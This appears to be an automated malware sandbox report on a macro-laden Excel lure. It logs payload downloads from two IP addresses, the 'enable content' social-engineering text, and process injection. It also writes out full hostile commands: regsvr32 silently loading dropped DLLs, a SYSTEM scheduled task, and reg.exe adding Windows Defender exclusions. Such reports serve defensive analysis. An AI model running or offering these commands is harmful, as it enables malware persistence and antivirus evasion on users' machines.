    Source: global trafficHTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10016EB05_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_100123465_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_100117585_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10014FC05_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00096EB06_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000923466_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000917586_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00094FC06_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00096EB014_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0009234614_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0009175814_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00094FC014_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00096EB017_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0009234617_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0009175817_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00094FC017_2_00094FC0
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,5_2_1000C6C0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,5_2_1000CB77
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.6.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
    Source: Claim-1368769328-09242021.xlsOLE indicator, VBA macros: true
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat 09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat 09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat 09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Fiosa.der 4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: 44463.7272820602[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.7272820602[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.7272820602[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: .................................&[.....(.P.....h.......L.......................................................................................Jump to behavior
    Source: C:\Windows\System32\reg.exeConsole Write: ................p...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............Jump to behavior
    Source: C:\Windows\System32\reg.exeConsole Write: ................p...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N.......(...............Jump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.derJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.derJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.derJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0C5.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,5_2_1000D523
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-1368769328-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,5_2_1000ABA3
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{60B8EB82-998D-4F4F-A497-6092A6C76F18}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2F8DB037-CF7B-4A1C-9C04-5425A37EBC9B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{37AC520D-E6F7-4F1E-8435-C1F504A7E422}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{37AC520D-E6F7-4F1E-8435-C1F504A7E422}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{60B8EB82-998D-4F4F-A497-6092A6C76F18}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{2F8DB037-CF7B-4A1C-9C04-5425A37EBC9B}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000A51A FindResourceA,5_2_1000A51A
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.497957177.0000000002791000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.497775026.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.500256751.0000000002791000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.552041458.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.563384856.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002202C push es; ret 5_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10021C96 pushad ; iretd 5_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 5_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026105 push edi; ret 5_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002514B pushad ; iretd 5_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027D58 pushfd ; ret 5_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027679 push es; ret 5_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10023B27 push es; retf 5_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022F6D push eax; retf 5_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022FAA push eax; retf 5_2_10022F97
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009A00E push ebx; ret 6_2_0009A00F
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009D485 push FFFFFF8Ah; iretd 6_2_0009D50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009D4B6 push FFFFFF8Ah; iretd 6_2_0009D50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00099D5C push cs; iretd 6_2_00099E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00099E5E push cs; iretd 6_2_00099E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009BB29 push esi; iretd 6_2_0009BB2E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002202C push es; ret 9_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10021C96 pushad ; iretd 9_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 9_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026105 push edi; ret 9_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002514B pushad ; iretd 9_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027D58 pushfd ; ret 9_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027679 push es; ret 9_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10023B27 push es; retf 9_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022F6D push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022FAA push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret 12_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd 12_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 12_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret 12_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd 12_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_10012AEC
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.6.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2208 base: 4E102D value: E9 BA 4C BA FF Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2180 base: 4E102D value: E9 BA 4C BA FF Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 448 base: 4E102D value: E9 BA 4C BA FF Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1704 base: 4E102D value: E9 BA 4C BA FF Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
